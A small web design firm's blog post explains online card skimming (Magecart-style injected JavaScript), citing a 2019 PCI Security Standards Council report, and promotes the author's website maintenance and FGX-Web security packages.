Written by Steve Perry
Published on

Alas, I cannot skim: Online skimming and what to do about it

Card fraud has been happening for years, with spates of tampered ATM slots and scams with contactless payment machines finding their way in the news many times over the years. As such, many people have grown wise to how to keep their card details safe whilst out and about in public, such as a hand over the keypad in the supermarket, making sure someone isn’t stood too close at a cash machine or checking for unusual attachments. And yet, many customers don’t stop to consider whether an ecommerce store they trust has adequate levels of security to protect them from online skimming.

On 1 August 2019, the Payment Card Industry Security Standards Council (PCISSC), in conjunction with the Retail & Hospitality Information Sharing and Analysis Center (ISAC), released ‘The Threat of Online Skimming to Payment Security’. As organisations concerned with account data security worldwide, improving standards, sharing relevant content to inform businesses and keeping customers’ data safe, they published this report to raise awareness of ecommerce website weaknesses and potential Magecart threats.

But what is ‘online skimming’?

Online skimming, also known as ‘web skimming’, is essentially digital card fraud. It is a system where a criminal exploits vulnerabilities, such as out-of-date plugins, to hack into a website and slip in harmful code. This is then used to collect (ie. ‘skim’) logins and payment details entered during the checkout process, sending over a copy to the hacker’s server.

This threat isn’t new – it was first reported back in 2015 but it’s now more prevalent. The PCISSC and ISAC report states that some of the latest attacks have been ‘JavaScript sniffers’ which are even harder to spot than the earlier versions. Research suggests these hackers usually target third-party services such as “advertising scripts, live chat functions, and customer rating features”. What’s worse is many website owners are unaware of the security breach with the report adding that 1 in 5 Magecart-infected websites are targeted again within days.

How can you protect your website and your customers?

Worried that you’ve not got the skills to spot suspect code? For most people, it’s just a sea of letters, numbers and symbols. If you don’t know how to swim, the moment you tumble out of a raft into choppy waters shouldn’t really be your first lesson.

If your website security is neglected, or the dangers not spotted in time, you are risking the added cost to your business for plugging the exploited holes within your website, in addition to causing unnecessary distress and loss to your customers. You will also have to face the likelihood of a hefty fine for breaching the terms of the General Data Protection Regulation (GDPR) (if your business operates in the UK or the EU).

Prevention and quick detection is key in these scenarios but having the time and skills to do this in-house is the main issue for most people. To effectively manage the risks, you would need to know how to identify coding vulnerabilities, use assessment and monitoring tools, in addition to carrying out regular scans and penetration tests. You’d also need to keep software up to date, install and regularly add security updates and patches, stay informed of new threats or developments, and know how to effectively clean the website if threats are found.

To help, I’d recommend taking a look at the Zenplan website maintenance package. This will reduce the risk of a breach as it involves regular updates which makes it harder for hackers to worm their way in. With the plan, you can also expect routine security scans and monitoring of the website, ensuring potential concerns are flagged as soon as possible.

I also offer a  FGX-Web security package which is a specialist security service using Foregenix FGX-Web technology. This is delivered by the Foregenix Threat Intelligence Team and ensures your website is monitored by analysts who are experts at reducing data breach risks. If a PCISSC Forensic Investigation (PFI) is carried out as a result of a data breach, your business could be charged a case fee (estimated at £3k) plus a set charge per card at risk. The FGX-Web security package comes with up to £50k warranty, depending upon which package is chosen, to give you peace of mind.

Interested in reading more about website security, why not check out ‘website security, the fundamentals’?

If you require any more information, or would like to enquire about website maintenance packages, feel free to send me an email at ideas@steveperrycreative.com, call on 01782 954282, or follow me on social media for bite-sized updates on Twitter @stevemarkperry.

Steve Perry Creative Ltd

Studio and registered office: 4 Back Lane, Brown Edge, Staffordshire ST6 8QS.

Copyright © 2012 – 2023 Steve Perry Creative Ltd., unless otherwise noted.

Registered in England & Wales, number 08354632.


Typeset in Söhne Kräftig and Söhne Buch, by Klim Type Co.

Set as 32/64, 24/32, 20/32, and 12/16 on an 8px/96px grid.

Colour palette selected for AAA contrast.